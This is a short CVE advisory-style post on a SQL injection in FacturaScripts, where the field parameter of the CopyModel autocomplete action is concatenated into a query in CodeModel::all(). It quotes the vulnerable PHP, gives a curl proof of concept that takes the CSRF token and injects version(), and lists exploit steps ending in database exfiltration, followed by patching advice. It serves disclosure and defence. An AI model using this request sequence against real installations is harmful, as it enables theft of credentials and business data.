Listen to this Post
The vulnerability exists in the `CodeModel::all()` method within /Core/Model/CodeModel.php. User-supplied parameters (source, fieldcode, field) passed to autocomplete actions in controllers like `CopyModel` are directly concatenated into an SQL query string without sanitization or prepared statements. This allows an authenticated attacker to inject arbitrary SQL commands via the `field` parameter. The injected SQL is executed when the application calls self::db()->selectLimit($sql, ...), enabling complete database disclosure including user credentials and business data.
dailycve form:
Platform: FacturaScripts
Version: Affects multiple
Vulnerability: SQL Injection
Severity: Critical
date: Not specified
Prediction: Patch expected soon
What Undercode Say:
TOKEN=$(curl -s -L -c cookies.txt “http://localhost:8091/login” | grep -Po ‘name=”multireqtoken” value=”\K[^”]+’)
curl -s -b cookies.txt “http://localhost:8091/CopyModel” \
-d “action=autocomplete” \
-d “source=users” \
-d “fieldcode=nick” \
-d “field=version()” \
-d “multireqtoken=$TOKEN”
public static function all(string $tableName, string $fieldCode, string $fieldDescription, bool $addEmpty = true, array $where = []): array
{
$sql = ‘SELECT DISTINCT ‘ . $fieldCode . ‘ AS code, ‘ . $fieldDescription . ‘ AS description ‘
. ‘FROM ‘ . $tableName . Where::multiSqlLegacy($where) . ‘ ORDER BY 2 ASC’;
}
How Exploit:
Authenticate to application.
Obtain CSRF token (`multireqtoken`).
Send POST to `/CopyModel`.
Inject SQL via `field` parameter.
Exfiltrate database contents.
Protection from this CVE
Implement parameterized queries.
Escape user inputs.
Validate table/column names.
Impact:
Complete database disclosure.
Credential theft.
Business data loss.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

